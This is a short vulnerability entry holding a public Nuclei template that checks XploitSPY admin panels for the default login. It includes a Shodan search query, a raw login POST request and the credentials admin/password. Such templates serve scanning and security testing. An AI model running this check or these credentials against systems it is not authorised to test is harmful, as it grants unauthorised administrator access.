xploitspy-default-login: XploitSPY - Default Login

Date: 2025-08-01 | Affected software: XploitSPY | PoC: public

Vulnerability description

The administrator panel can be accessed with the default login and password.

PoC code [public]

id: xploitspy-default-login

info:
  name: XploitSPY - Default Login
  author: andreluna
  severity: high
  description: |
    Default login and password to access administrator panel
  reference:
    - https://github.com/XploitWizer-Community/XploitSPY
  metadata:
    max-request: 1
    shodan-query: html:XploitSPY
  tags: xploitspy,default-login,vuln

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/login

        username={{user}}&password={{pass}}&hostname={{Hostname}}

    attack: pitchfork
    payloads:
      user:
        - admin
      pass:
        - password
    redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Change Password"
          - "Logout"
          - "XploitSPY"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402204bc6556accb96ce20d491d2dce90b2226146f46487c8b069c41bbf2765cee41b02204bd7d9465f31e731831e81bf1c6ec6d7917df2bb35a8bd3f5c47257eea72ddc4:922c64590222798bb761d5b6d8e72950